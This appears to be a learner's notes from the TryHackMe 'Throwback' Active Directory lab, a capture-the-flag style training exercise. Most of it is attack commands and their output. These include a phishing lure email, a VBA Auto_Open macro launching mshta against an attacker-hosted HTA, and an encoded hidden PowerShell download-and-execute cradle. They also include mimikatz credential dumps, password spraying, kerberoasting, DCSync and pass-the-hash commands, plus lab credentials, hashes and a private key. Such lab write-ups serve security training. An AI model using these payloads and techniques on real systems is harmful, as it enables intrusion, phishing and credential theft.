###Throwback lab from THM
========================================================================================= ACTIVE DIRECTORY ========================================================================================= An Active Directory collections of servers and computers inside a domain An Active Directory collections of servers and computers inside a domain Domain controller is a windows server running the Active Directory Domain Services
Types of Active Directory Users : Domain Administrators : Controls the domain and usually have access to the domain controllers Service Accounts : used mostly for service maintenance Local Administrators : have access and make changes to the local computers Domain Users : eveeryday users on the domain
Domain Policies : They dictate how a server operate and dictate what rules it will and will not follow
Sample Policies = Disable Windows Defender - Disable windows defeender across all machine on the domain Digitallly Sign Communication - Can disable or enable SMB signing on the domain controller
Domain Services : The service the domain controller provides to the PC in the domain, Example LDAP DNS, LLMNR,NBT-NS
Domain Authentication : the authentication proceddure set in place implemented across the domain Kerberos = uses ticket granting ticker and service tickets fot auth purposes NTLM + default windows auth protocoal uses encrypted challenge / response
========================================================================================= POWERSHELL ========================================================================================= Powershell has a VERB-NOUN flavor
Example of Verbs:
Get Start Stop New Oot Read Write
Example of statements : get-help
Get-Command gets all the cmdlets installed on the current device. The great thing about this cmdlet is that it allows for pattern matching like the following. Seaching for commands using Get-Command + wildcards : Get-Command -Help Get-Command Get-
FIltering Objects : Verb-Noun | Where-Object -Property PropertyName -operator Value
Here’s an example of checking the stopped processes:
========================================================================================= POWERSHELL DOMAIN ENUMERATION =========================================================================================
USING POWERVIEW
Get-NetDomain : List domian information inluding FQDN Get-NetDOmainController ; List all the domain controllers within the network Get-NetForest : Provides all the assosiated domains in a forest, the root domain , as well as the domain controller for the root domain Get-NetDomainTrust : Provide trust information across domains
=========================================================================================
ENTERING THE BREACH
=========================================================================================
Publicly facing machines in the Network
Throwback-PROD
Throwback-FW01
Throwback-MAIL
ATTACKING - PROD 10.200.154.219
Domain Name : THROWBACK.LOCAL NetBIOS COmputer Name : THROWBACK-PROD DNS Computer Name : THROWBACK-PROD.THROWBACK.local
ATTACKING - MAIL 10.200.154.232 credentials : tbhguest:WelcomeTBH1!
Extracted contacts from the mailserver using guest account
W Humphrey | HumphreyW | HumphreyW@throwback.local | ||
SummersW | Summers Winters | SummersW@throwback.local | ||
FoxxR | Rikka Foxx | FoxxR@throwback.local | ||
noreply | noreply noreply | noreply@throwback.local | TBH{4060a70860f0a1648e5a991de1739888} | |
DaibaN | Nana Daiba | DaibaN@throwback.local | ||
PeanutbutterM | Mr Peanutbutter | PeanutbutterM@throwback.local | ||
PetersJ | Jon Peters | PetersJ@throwback.local | ||
DaviesJ | J Davies | DaviesJ@throwback.local | ||
BlaireJ | J Blaire | BlaireJ@throwback.local | ||
GongoH | Hugh Gongo | GongoH@throwback.local | ||
MurphyF | Frank Murphy | MurphyF@throwback.local | ||
JeffersD | D Jeffers | JeffersD@throwback.local | ||
HorsemanB | BoJack Horseman | HorsemanB@throwback.local |
SummersW@throwback.local,FoxxR@throwback.local,DaibaN@throwback.local,PeanutbutterM@throwback.local,PetersJ@throwback.local,DaviesJ@throwback.local,BlaireJ@throwback.local,GongoH@throwback.local,MurphyF@throwback.local,JeffersD@throwback.local,HorsemanB@throwback.local
SummersW@throwback.local FoxxR@throwback.local DaibaN@throwback.local PeanutbutterM@throwback.local PetersJ@throwback.local DaviesJ@throwback.local BlaireJ@throwback.local GongoH@throwback.local MurphyF@throwback.local JeffersD@throwback.local HorsemanB@throwback.local
“SummersW@throwback.local”,”FoxxR@throwback.local”, “DaibaN@throwback.local”, “PeanutbutterM@throwback.local”, “PetersJ@throwback.local”, “DaviesJ@throwback.local”, “BlaireJ@throwback.local”, “GongoH@throwback.local”, “JeffersD@throwback.local”, “HorsemanB@throwback.local”
Hey Team,
There has been an update the the official Microsoft outlook used in our environment, kindly download and install the binary attached to this email with urgency to update outlook in order to avoid downtimes
Thank you for your compliance
IT Support
ATTACKING - FW01 10.200.154.138 pfsense using default credentials
ID_RSA —–BEGIN RSA PRIVATE KEY—– MIIEowIBAAKCAQEAqgsr8IE43iaA7wzgTmbpjB7WsRC2lIRFJkgTo4rFkfAck/lm c4Q+SuwtpjYv9XK57Qwi/Qx2E08V27SpBPp/wFSQAao9XyRqwITdHWYTTmdcdAAK dReGxZYCDbweQkkgx2estvSTQ48OltKDgSBJyc7g+1t8eDWS91ubFkSbCtbdeUpZ O+i25eXNX8PeJSWWG9qGxisa2+DJJO4GED+QY4VbSNugINhuWGM33FPsNbKag7dH M2J7JNkGZKd6HyR7t87rwlqWxiQytSAb9WCwuPnVL7PBl1aawSdqcaN2QFx7EFxn JP7Fhg1ZJLTfuewcYbdqrN5ltOLnI3a9EE7I1wIDAQABAoIBAEq0TcGDg/BVCh/7 kC/hlokwozF3Hj9xPM/sqnQW62WKD4QS9aeaWaOgzw1OkRNMK9Kwmk6Bwv4IqJm1 bOv7AVUF0Z5ppDzASwX5WQspZSH01vE/c1it1U/I724JT2Hfrr7sFTzrhicQGmC4 a323KbO3Z7AGKVDGeKKjZCcMTPEdbPkGriD6o72cQjxNutUttHMl19MQ9itksh53 8fuG8WjmZoN2ml9oz29IuLR/riIQq2HJ4CTRX10iEJU0yeJNhYpyAuuzl7OE35+J 30/yGwKGX6Nm4z5JXuua6L7faL2qDjuD5cSVM02iPfs8Xyo/R8yWhxvQ50JupzN/ LgG/RYECgYEA2p24GsmejWqBavcZLwRfqIgSTxsL/7015JVOF/i8xqNEFRjreHEn dVvEfZI2LvBSl9ZPnxu/hVJ3cE6OK6GrGuDt1Aj3HxZRXU5W33mw3jM4QmPfDc5D NzzvWB9ZIrbzFrrza4cuwtYJqWsny2yIMOnCFAyR+4E9EQYJmkKtwW8CgYEAxx8c 9OZwh97VRT19mETnIbVoF91nb18D+IVK2n/+cNa76LRoz+2wafEYbsXzm0FClcEP uL+iWqCl5GhrrypBnPH77rO2F2It2mmeNlmICK7bhFdCrsKiB+1DV7q1hiMHjWXS h5kFN6ekjWQaHEf/iTPUcWvyMY1Kj5rqYlCa6xkCgYBpq57X4+jttjOEPpg/r7+F OPCQqCQuo4ivSrQKxkKJSVWZVQhMmXVXNtpNUCU8nxFtLzwhTkpO6UOuV2pFEMoi HeMXgJXiwujlTv6S2sFxRhTFkny4saCvzJZsZAqzyvbJX+hVa2xg5RCagZ8kpvtV mUgkZMcTaK7Z0a9Gj0BppQKBgQCDdVwFpvlWClxc2QrI83xwebZeQxKdqWoSsdVI ScYusuXd7PVhiPe2CbDquQ9qSXxvJ8V8YDAMixDaqcGmJEyrE+sSnVyzNWM2VhJY qWUw7lgImB9zBxY4C4ExMxfSld/PjxCd6v1R0ADIQ/UlBLeE2k4AD5cW9cPq6Qii nbqZSQKBgBzPXrMIM+4RAMz2MLcjBhZBVJ3pYt1PM4UorfWJhi+vgDdYxwIZ4fYe xklP11hdkJ2lG20fA0tqaCuOtcos7cQFrLwjAQJA6TrO+qfhHEbgaZVI7UYa1PPv zMHfl5yy1ghQeCUMoDbw1Wa0ohy9/6fABe45ACh1DOE72LOGf3Cr —–END RSA PRIVATE KEY—– ssh -i id_rsa root@10.200.154.138
POST EXPLOITATION ON FW01
credentials found in log files HumphreyW:1c13639dba96c7b53d26f7d00956a364
=========================================================================================
FIRST CONTACT
=========================================================================================
PASSWORD SPRAYING
Some examples of weak passwords:
Summer2020
Management2020
Management2018
Password2020
[80][http-post-form] host: 10.200.154.232 login: MurphyF password: Summer2020
========================================================================================= PHISHING =========================================================================================
Target Identification
Payloads Staged & Stageless payloads: staged payloads requires an handler to catch the payload and send the second stage to trigger the reverse shell Example : windows/x64/shell/reverse_tcp stageless payalods do not requre an handler and can be caught with utilities like netcat Example : Windows/x64/shell_reverse_tcp
========================================================================================= HASH CRACKING USING RULES =========================================================================================
Asides from running hashcat agains a wordlists, it is advidable to use rules while bruteforcing we can also use mentallist tools to generate a custom password list
Sometimes your standard wordlist like rockyou is not enough to crack a hash. You can use a rule list to change the wordlist and add rules to it in order to crack a hash. A rule list works by having a set of rules that can append characters to a password, attach characters, and substitute words and characters.
https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule PETERSJ::THROWBACK:81847d458ac9f3d1:d008a6c248e65c98d2e39598caa8d1ac:0101000000000000005c38476a0dd801e5e171523de4361d0000000002000800340031004d004b0001001e00570049004e002d00550052004400530059004c00510053005a003600360004003400570049004e002d00550052004400530059004c00510053005a00360036002e00340031004d004b002e004c004f00430041004c0003001400340031004d004b002e004c004f00430041004c0005001400340031004d004b002e004c004f00430041004c0007000800005c38476a0dd801060004000200000008003000300000000000000000000000002000007d5c6421d062fd571e0c26dd53578f8116274945c049da7ed89a81eb6a255bbc0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00350030002e003100350031002e00320035000000000000000000:Throwback317
Password: Throwback317
Local Priviledge Escalation on PROD
DefaultDomainName : DefaultUserName : BlaireJ DefaultPassword : 7eQgx6YzxgG3vC45t5k9 AltDefaultDomainName : AltDefaultUserName : AltDefaultPassword :
Domain Enumeration on PROD from Blairej xfreerdp /v:10.200.154.219 /u:blairej /p:7eQgx6YzxgG3vC45t5k9 /size:96% impacket-psexec throwback.local/BlaireJ:7eQgx6YzxgG3vC45t5k9@10.200.154.219 Get-NetDomain Forest : THROWBACK.local DomainControllers : {THROWBACK-DC01.THROWBACK.local}
Get-NetDomainController
Forest : THROWBACK.local CurrentTime : 1/19/2022 8:23:20 PM HighestCommittedUsn : 2261635 OSVersion : Windows Server 2019 Datacenter Roles : {SchemaRole, NamingRole, PdcRole, RidRole…} Domain : THROWBACK.local IPAddress : 10.200.154.117 SiteName : THROWBACK
Get-NetUSer | select cn |
Administrator Guest krbtgt WEBService Rikka Foxx Summers Winters John Blaire sshd SQLService Nana Daiba Leeroy Stuart TBService LoginService STAGEService Rue White Alisha Guthrie Hallie Cochran Vicky Burton William Powell Derick Nieves Joy Castro Walter Poole Bryan Atkins Faussie Hampton Courtney Hayden Clara Quinn Tony Rosales Ava Petersen Rene Eaton Marvin Livingston Hugh Gongo Stacey Foley Violet Boyer Deno Jacobson Jayne Nixon Hans Webb Norman Lindsey Lacey Parker Lanny Sexton Diann Anderson Jerrod Spence LLoyd Sosa Robert Neal Bette Baldwin Adrienne Blackwell Cheryl Trevino Pedro Kramer Stephen Clay Ivan Montoya Josef Brenard Daniel Thorton Verna Blackenship Dominic Cortez Merle Williamson Weston Hanson Jeff Lamb Lewis Stanley Shanna Cunningham Dominique Pate Ezra Harding Erik Wilkinson Kent Brooks Jody Dotson Angelica Benton Renee Burch Spooks Dominic Jeffers Jon Peters Wittingston Humphrey Bojack Horseman TaskMgr Hans Mercer Backup User
========================================================================================= C2 - Empire and StarKiller ========================================================================================= 1.) Go to the listeners tab and select CREATE LISTENER.
2.) Go to the stagers tab and select GENERATE STAGER.
Launch agent on the target
shell on c2
Invoke-Mimikatz module on Empire mimikatz(powershell) # lsadump::lsa /patch Domain : THROWBACK-PROD / S-1-5-21-1142397155-17714838-1651365392 RID : 000003f2 (1010) User : admin-petersj LM : NTLM : 74fb0a2ee8a066b1e372475dcbc121c5 RID : 000001f4 (500) User : Administrator LM : NTLM : a06e58d15a2585235d18598788b8147a RID : 000001f7 (503) U ser : DefaultAccount LM : NTLM : RID : 000001f5 (501) User : Guest LM : NTLM : RID : 000003f1 (1009) User : sshd LM : NTLM : fe2acb5ea93988befc849a6981e0526a RID : 000001f8 (504) User : WDAGUtilityAccount LM : NTLM : 58f8e0214224aebc2c5f82fb7cb47ca1
========================================================================================= Mimikatz - hashdump ========================================================================================= put Mimikatz in privilege mode after deactivating AMSI and EDR privilege::debug token::elevate
Dumping Password Hashes
lsadump::lsa /patch sekurlsa::tickets /export
Dumping SAM Hashes lsadump::sam
Dumping Creds from Logged In Users sekurlsa::logonPasswords
========================================================================================= BLOODHOUND - Sharphound injestor ========================================================================================= . ./SharpHound.ps1 Invoke-Bloodhound -CollectionMethod All -Domain throwback.local -ZipFileName loot.zip
========================================================================================= LATERAL MOVEMENT // ROUTING & PROXYCHAINS =========================================================================================
To get access to internal networks, we first get access to a meterpreter
use post/multi/manage/autoroute to set up the routing tables so data from the attacker PC, can be routed to the internal network through the victim
use auxiliary/server/socks_proxy to setup the socks proxy server on the attacking machine set verson to 4a srvhost 127.0.0.1
proxychains crackmapexec smb 10.200.154.0/24 -u users -d throwback.local -H hash
========================================================================================= KERBEROASTING ========================================================================================= Its noteworthy that kerberoasting targets service accounts, and not user account ! we can find kerberoastable accounts using Bloodhoud graph
proxychains python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -dc-ip 10.200.154.117 THROWBACK.local/blairej:7eQgx6YzxgG3vC45t5k9 -request
Cracked Creds from kerberoasting : mysql337570
http://timekeep.throwback.local/dev/passwordreset.php?user=murphyf&password=hacker1 Password reset to hacker1 Password successfully updated TBH{326e71e82d2cfc439ee513340b8d9222}
========================================================================================= MALICIOUS MACRO & MSFCONSOLE HTA SERVER ========================================================================================= After adding macro to xlsm we use the “windows/misc/hta_server ” module in msf to host a malicious HTA as a second stage payload to be sent
MACRO USED BELOW
Sub HelloWorld()
PID = Shell("mshta.exe https://192.168.100.128:8080/c9496fz.hta")
End Sub
Sub Auto_Open()
HelloWorld
End Sub
========================================================================================= Got access tp TImeKeep machine using HTA server method, mograted process to an NT/AUTORITY service then hashdump to gather credentials
meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:43d73c6a52e8626eabc5eb77148dca0b::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: sshd:1008:aad3b435b51404eeaad3b435b51404ee:6eea75cd2cc4ddf2967d5ee05792f9fb::: Timekeeper:1009:aad3b435b51404eeaad3b435b51404ee:901682b1433fdf0b04ef42b13e343486::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
CRACKED user:pass
-
Timekeeper:keeperoftime
meterpreter > creds_all [+] Running as SYSTEM [*] Retrieving all credentials msv credentials ===============
Username Domain NTLM SHA1 ——– —— —- —- Administrator THROWBACK-TIME 43d73c6a52e8626eabc5eb77148dca0b f994d4fe03f5ac239de4971c50f3af42e7c9436e THROWBACK-TIME$ THROWBACK 9dcc499124209f0aa44a20c478aa53fd 13c7c5ddf0ec9ccf5fe0b2f6b281adb51cb82b1c
wdigest credentials
Username Domain Password ——– —— ——– (null) (null) (null) Administrator THROWBACK-TIME (null) THROWBACK-TIME$ THROWBACK (null)
kerberos credentials
Username Domain Password ——– —— ——– (null) (null) (null) Administrator THROWBACK-TIME (null) THROWBACK-TIME$ THROWBACK.local d1 f7 12 36 94 54 fc ce 9b 8a 4b f0 0f b9 c1 82 14 bd 6c 24 c3 93 5d 4d 69 8d e7 f 5 44 81 f1 1c cc 10 86 58 21 fd a7 9e ff 8d 38 72 de 1a d8 b8 7a 8d bb 95 9f 9f 28 42 a1 76 73 a9 56 7b 9e 39 30 f4 f6 84 0f c6 e3 dd 27 07 d8 a9 78 a1 5c 09 fe fb 33 10 d9 d2 2d 76 7b 7e ac 1c d5 04 df 1e e1 cc 2a af ca 0b ad 51 a0 1b eb 35 32 2 5 98 89 73 40 45 18 5c b4 51 7b f5 7f 1f fa 40 80 97 a2 f9 15 05 ec 81 b9 93 15 66 ea 96 d8 2e 1b e2 2f 42 59 b9 ab d3 ce 7f 05 1b 10 78 d0 9c f3 62 d1 05 c3 60 6a b9 4f 66 ab 53 b5 09 48 27 94 84 1c dd 79 0f 04 98 cc e2 39 4b 41 e0 23 d1 8e 15 8 6 db ab 02 24 73 57 79 fd d4 f8 0f 06 f5 4c d0 18 25 7a 72 5e 35 1f b9 9f 38 e2 00 94 c0 df e8 a8 7e 19 c4 75 09 15 63 0d 4c d9 65 5b 6e 6f 91 7a throwback-time$ THROWBACK.LOCAL (null)
ACCESS TO TIMEKEEPER proxychains ssh Timekeeper@10.200.154.176 pw: keeperoftime
got access to timekeeper user; created and sent in mrat.exe to get meterpreter shell; migrated to NT/AUTHORITY process; entered system shell ; change admin password to random using net user administrator /random
then ssh’sd into admin account using proxychains
ACCESS TO MYSQLDB FROM TIMEKEEPER users in database from timekeep machine +————————-+ | users | +————————-+ +—————+————————————————-+ | USERNAME | PASSWORD | +—————+————————————————-+ | spopy | ilylily | | foxxr | Fnfdsfdf49sA(2o1id | | winterss | rei0g0erggdfs(2o1id | | daiban | Bananas! | | blairej | BlaireJ2020 | | FLAG | TBH{ac3f61048236fd398da9e2289622157e} | | daviesj | FEFJdfjep302dojsdfsFSFD | | horsemanb | XZCFLDOSPfem,wefweop3202D | | peanutbutterm | fi9sfjidsJXSVNSKXKNXSIOPfpoiewspf | | humphreyw | fedw99fjpfdsjpjpfodspjofpjf99 | | jeffersd | fDSOKFSDFLMmxcvmxz;p[p[dgp[edfjf99 | | petersj | owowhatsthisowoDarknessBestGirlowo123uwu”);
foxxr | ILoveAnimemes :3 |
daviesj | efepjfjsdfjdsfpjopfdj4po |
gongoh | etregrokdfskggdf’fd4po |
dosierk | e2349efjsdsdfhgopfdj4po |
murphyf | hacker1 |
jstewart | e423jjfjdsjfsdj32 |
+—————+————————————————-+
image
domain_users in database from timekeep machine
MariaDB [timekeepusers]> show tables; +————————-+ | Tables_in_timekeepusers | +————————-+ | users | +————————-+ 1 row in set (0.001 sec)
MariaDB [timekeepusers]> use domain_users; Database changed +———————-+ | ClemonsD | | DunlopM | | LoganF | | IbarraA | | YatesZ | | CopelandS | | MckeeE | | HeatonC | | FlowersK | | HardinA | | BurrowsA | | FinneganI | | GalindoI | | LyonsC | | FullerS | | SteeleJ | | WangG | | LoweryR | | JeffersD | | GreigH | | SharpK | | KruegerM | | ChenI | | VillanuevaD | | BegumK | | TBH{ac3f61048236fd39 | | 8da9e2289622157e} | +———————-+ 27 rows in set (0.002 sec)
Other database content
SInce we have domain usernames and some passwords from the database we use the credentials to spray the domain controller using the jumbox by proxychains
SMB 10.200.154.117 445 THROWBACK-DC01 [+] THROWBACK.local\JeffersD:Throwback2020
Domain Controller Credentials THROWBACK.local\JeffersD:Throwback2020
proxychains xfreerdp /u:JeffersD /p:Throwback2020 /v:10.200.154.117
FILE SHARE FROM WINDOWS TO LINUX USING AUTHENTICATED SMBSHARE ——————————————————————————————————————————————————————————————– some times group policies on AD will not permit connection to exeternal unsecure smbshare, so while creating an smbserver on linux using smbserver.py, user SMBv2 protocal and include user & pass for authentication
python3 /opt/impacket/examples/smbserver.py -smb2support -username hacker -password hacker fileshare .
then connect to if from windows this way net use \10.50.151.25\fileshare /user:hacker hacker
after connected succesfully, you can safely copy item from and to the saerver
EXPLOITING USERS WITH DCSYNC PRIVILEGES
FInding users with DCSYNC priv using bloodhound, search “Find Principals with DCSync Rights”
with DCSYNC priviledges, we can dump credentials on the machine we have priviledges on, but with a valid credential of the user with tthe priviledges
TBH_Backup2348!
proxychains impacket-secretsdump -dc-ip 10.200.154.117 throwback.local/backup@10.200.154.117
THROWBACK.local\MercerH:1206:aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea::: ‘“sekurlsa::pth /user:mercerh /domain:throwback.local /ntlm:5edc955e8167199d1b7d0e656da0ceea”’ proxychains impacket-psexec -dc-ip 10.200.154.117 -hashes aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea throwback.local/mercerh@10.200.154.117
========================================================================================= CROSS —– ATTACK =========================================================================================
If we have Trust priviledges to another domain controller, we can authenticate to that DC , with the admin credential of our currently owned DC
impacket-psexec throwback.local/BlaireJ:7eQgx6YzxgG3vC45t5k9@10.200.154.219 proxychains impacket-psexec -dc-ip 10.200.154.117 -hashes aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea throwback.local/mercerh@10.200.154.117 proxychains xfreerdp /u:MercerH /p:-changepw /v:10.200.154.118 /size:80%
lport => 4434
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJAB3ADEAZwBDAEkAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAdwAxAGcAQwBJAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAdwAxAGcAQwBJAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4ANQAwAC4AMQA1ADEALgAyADUAOgA4ADAAOAAwAC8AbAA4ADcAUgBhAGEAYgBUAE0AbwA5AFAALwBCAEIASwA0AHoAZABKAFkAMwAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4ANQAwAC4AMQA1ADEALgAyADUAOgA4ADAAOAAwAC8AbAA4ADcAUgBhAGEAYgBUAE0AbwA5AFAAJwApACkAOwA=
ESM-Example@TBHSecurity.com FIN-Example@TBHSecurity.com HRE-Example@TBHSecurity.com ITS-Example@TBHSecurity.com SEC-Example@TBHSecurity.com
SEC-Jstewart@TBHSecurity.com username : Jstewart databreach: pwnDB password: aqAwM53cW8AgRbfr
TBSEC_GUEST:WelcomeTBSEC1! TBH{19b6ca4281bbef3ee060aaf1c2eb4021}
user dc : TBH{3efabe3366172f3f97d1123f2cc6dfb5}
$krb5tgs$23$TBService$TBSECURITY.LOCAL$TBSecurity.local/TBService$b6dde6b28ff3e7d640e1aba4deb7a8f4$0b5fbab74463df311800ea7ac953a7b0666c1cfadf1e0924d43c8321d07786bcaed59c52e6b513a84296c4a3b35a0f0556fab4bbfef7cadbaa739e0a921758c811a1aa7dbe81ca85b33a4eb9cc5ac52a73c04db150f19ead38606263c0799115761ac13e72006ad06583753328c13f2c7ed63725bc73d35f3f710af63e3a5971faceeb58e23b0cac57d9eef0f89dfbfa7e021d027223f4bacebfc99ff59519f38bdffc0f800da6e47f8b6f1a170b32c7420dcf5cf0b580ea653d8cab0ebec0f0fc84cf17bd4b0a48014500a02669d65fec2ebeb8598e7ddd9fe91bb9f03b016152007c5d70efbd40d44863eca49a8dcd6f177ea2f58236b6363269bbe099976ab0033fe32a3997cbc59606ade44e274952e8df7ec96253536dda361df7eafd7921c39473a00c8674b5fac13743a3a25abbda36d0574ae5524459c088a46da80f0aaea30e85962ff0720304808ed680eacea396666ead151a3007c16ff48ac7bba12499811d6a8eb8b565d81c8af85cdc1e6d85430f0979c2d04cb58fccb3a372316f60d79795aed56b296e2da8ad9070e2aa8143f6f4423aec59e1aae291ad3a344bfa953aee3e82f1377f822a31ea1c7df0e6e80e1776a0ae424882aca5168125f1bca66d48d935120fbba904fdb6e185302c50586514236a810880221830d4fed48d0622ded3668470e9ce94df7bea190f02b6496acb41971c2e16dc83c25215143190058b17689f3d05dafd74df3db6cdbb2449cbd9692e931f986cc6aaa9896b143c4a2dcfe03b50393500b5d63e1027a4523667a0a1fc3b209c6daac3979fb3054061db2f3bb0cff64a674326a02b748f1d6e9459ae4fd524b46f1ec2944227911f5d681d5a2df05e5fb634f7337cac4e78e06ea582f73aff990d45271bc1b1816aaf0d67d3300386fc9dc9fc3b9e3d6261228922ed10be93fb570a2116b886ccca5f585ad65e529e2bdc907a760d4e193397c11158a4a7f02e2b4e9ce841a1b254e5069afce57725af1072270d363b513f3791395b5d69e4348a3b8167eff21072f5667869abb75080eed567385c3447702b5cbca675baae0bd9c9bfa05066947ec368b20e9e51d3e2c4ea48a286d5d0a9eade6f1878c4c265c49be053b2ac50a96cf1b12b10cabfc2c8a2161d4835905fcbfd355a4c67a7eb8b2c4a9951708ccb383c2f574e41564f3f12c072375e0d0b3f62913e3717f6178f253c195d2429c94f60a3c6998a8c2ab6582413c007c5feb78bdca64ca9c11244db7a2fe69fbd0f39d9e4835578b4403a7e619e1881bdbc9ffb05e0b6534fec940583bfa87f4994f7bd7568d66487075ab8cca58ae822798c885e7a2473fcd3a0157affba7151f443e7b190aace7a262ae72b67992ea854cfbe3c876cabb1c6